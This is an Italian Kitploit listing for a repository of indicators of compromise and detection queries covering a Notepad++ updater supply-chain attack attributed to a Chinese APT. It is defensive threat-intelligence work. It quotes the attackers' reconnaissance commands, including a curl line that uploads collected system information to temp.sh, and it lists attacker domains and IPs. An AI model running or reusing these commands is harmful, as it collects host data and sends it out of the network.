Skip to content
KitploitKITPLOIT
StrumentiBlog
Log in
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

FeedContattoPrivacy© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
notepadpp-supply-chain-iocs — IoC e regole di rilevamento per l'attacco alla supply chain di Notepad++ (CVE-2025-15556) — Lotus Blossom APT, giugno–dicembre 2025. Include query Falcon LogScale, regole YARA/Sigma e mappatura MITRE ATT&CK. | Kitploit
Strumenti/GitHubGitHub/renat0z3r0/notepadpp-supply-chain-iocs
Gestione degli Indicatori di Compromissione (IOC)Feed e Aggregatori di MinacceAnalisi delle VulnerabilitàInformatica ForenseAnalisi MalwareThreat IntelligenceSicurezza della Supply ChainApprendimento e Formazione

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Risposta agli Incidenti
GitHubrenat0z3r0/notepadpp-supply-chain-iocs

notepadpp-supply-chain-iocs

IoC e regole di rilevamento per l'attacco alla supply chain di Notepad++ (CVE-2025-15556) — Lotus Blossom APT, giugno–dicembre 2025. Include query Falcon LogScale, regole YARA/Sigma e mappatura MITRE ATT&CK.

Vedi Repository
1207 mesi faNon ancora revisionato
Condividi

Attacco alla Supply Chain di Notepad++ — Repository IoC

CVE-2025-15556 | Lotus Blossom / Raspberry Typhoon | Giugno – Dicembre 2025

Last Updated IoC Count License: MIT MITRE ATT&CK


Panoramica

Questo repository contiene una raccolta completa e consolidata di Indicatori di Compromissione (IoC) relativi all'attacco alla supply chain di Notepad++ divulgato il 2 febbraio 2026.

Tra giugno e dicembre 2025, un attore di minaccia sponsorizzato dallo stato cinese ha compromesso l'infrastruttura di hosting di Notepad++, dirottando il meccanismo di aggiornamento integrato (WinGUp) per distribuire selettivamente installer troianizzati a utenti mirati. L'attacco ha sfruttato la mancanza di verifica crittografica nell'aggiornatore (pre-v8.8.9), consentendo la distribuzione di backdoor personalizzate, Cobalt Strike Beacon e payload Metasploit.

Fatti chiave

CVECVE-2025-15556 — Download di codice senza verifica d'integrità
Threat ActorLotus Blossom (Bilbug, Raspberry Typhoon, Thrip) / Zirconium (Violet Typhoon)
Active PeriodGiugno 2025 – 2 Dicembre 2025
Attack VectorCompromissione della supply chain tramite aggiornatore automatico WinGUp
TargetsGoverno, telecomunicazioni, servizi finanziari, provider IT (Filippine, Vietnam, El Salvador, Australia, Asia orientale)
MalwareBackdoor Chrysalis (personalizzata), Cobalt Strike Beacon, Metasploit Meterpreter
Patched inNotepad++ v8.8.9+ (verifica certificato) / v8.9.1+ (validazione XMLDSig)

Catene di infezione

Kaspersky GReAT ha identificato tre distinte catene di infezione, ruotate approssimativamente ogni mese per eludere il rilevamento:

Catena #1 — Luglio/Agosto 2025

GUP.exe → update.exe (NSIS) → ProShow.exe (legitimate) → exploit via "load" file
  → Metasploit downloader → Cobalt Strike Beacon
  • Abusa di una vecchia vulnerabilità nel software ProShow invece del DLL sideloading
  • Ricognizione: whoami && tasklist → esfiltrato via temp.sh
  • Directory di lavoro: %appdata%\ProShow\

Catena #2 — Settembre/Ottobre 2025

GUP.exe → update.exe (NSIS) → script.exe (Lua interpreter) → alien.ini (compiled Lua)
  → shellcode via EnumWindowStationsW → Metasploit downloader → Cobalt Strike Beacon
  • Utilizza un interprete Lua legittimo per eseguire shellcode compilato
  • Ricognizione ampliata: whoami && tasklist && systeminfo && netstat -ano
  • Directory di lavoro: %appdata%\Adobe\Scripts\

Catena #3 — Ottobre 2025

GUP.exe → update.exe (NSIS) → BluetoothService.exe (legitimate) → log.dll (sideloaded)
  → decrypts "BluetoothService" shellcode → Chrysalis backdoor
  • Tecnica classica di DLL sideloading
  • Nessuna ricognizione incorporata (a differenza delle catene 1 e 2)
  • Directory di lavoro: %appdata%\Bluetooth\
  • Cobalt Strike Beacon associato trovato in C:\ProgramData\USOShared\
                     ┌─────────────────────────────────────────────────────────┐
                     │              COMPROMISE TIMELINE                        │
                     ├─────────┬─────────┬─────────┬─────────┬─────────┬──────┤
                     │  Jul 25 │  Aug 25 │  Sep 25 │  Oct 25 │  Nov 25 │Dec 25│
                     ├─────────┴─────────┴─────────┴─────────┴─────────┴──────┤
  Chain #1 (ProShow) │████████████████████                                    │
  Chain #2 (Lua)     │                    █████████████████████████████        │
  Chain #3 (DLL SL)  │                              ██████████████            │
  Infra access       │████████████████████████████████████████████████████████│
                     └────────────────────────────────────────────────────────┘

Contenuti del repository

FileDescrizione
notepadpp_supply_chain_iocs.csvDataset completo di IoC (105 indicatori) con mappatura MITRE ATT&CK

Schema CSV

ColonnaDescrizione
ioc_typeTipo: ip, domain, url, sha1, sha256, filepath, filename, useragent, behavior, cve, attribution, compromise_window
ioc_valueIl valore dell'indicatore
chainCatena di infezione (1, 2, 3, 1/2, 2/3, all, n/a)
contextDescrizione di cosa rappresenta l'IoC
sourceFonte dell'intelligence (Kaspersky, Rapid7, CrowdStrike, Tenable, Kevin Beaumont)
riskSeverità (CRITICAL, HIGH, MEDIUM, LOW, INFO)
mitre_techniqueID tecnica MITRE ATT&CK

Rilevamento e Caccia alle Minacce

Indicatori prioritari (iniziare da qui)

Comportamentali — indipendenti dagli IoC, massimo valore:

  • gup.exe che genera qualsiasi processo figlio diverso da un installer legittimo firmato di Notepad++
  • gup.exe che si connette a domini/IP diversi da notepad-plus-plus.org, github.com, release-assets.githubusercontent.com
  • Creazione di directory: %appdata%\ProShow\, %appdata%\Adobe\Scripts\, %appdata%\Bluetooth\
  • Creazione di %localappdata%\Temp\ns.tmp\ (runtime NSIS — presente in tutte le catene)

Rete — alta confidenza:

  • Risoluzione DNS di cdncheck.it.com, safe-dns.it.com, self-dns.it.com, api.skycloudcenter.com, api.wiresguard.com
  • Connessioni a temp.sh (51.91.79.17) — specialmente con upload di file tramite curl
  • Richieste HTTP con URL temp.sh incorporati nell'header User-Agent
  • Connessioni in uscita a 45.76.155.202, 45.32.144.255, 95.179.213.0, 45.77.31.210

Comandi di ricognizione (post-sfruttamento):

cmd /c whoami&&tasklist > 1.txt
cmd /c "whoami&&tasklist&&systeminfo&&netstat -ano" > a.txt
curl -F "[email protected]" -s https://temp.sh/upload

Query CrowdStrike Falcon LogScale

Comportamentale: caccia ai processi figli di GUP.exe
#event_simpleName=ProcessRollup2 event_platform=Win ParentBaseFileName="gup.exe"
| FilePath=/\\Device\\HarddiskVolume\d+(?<shortFilePath>.+$)/
| groupBy([FileName, SHA256HashData, shortFilePath, CommandLine])
Caccia multi-IoC su eventi di processo, rete e DNS
Scarica lo strumento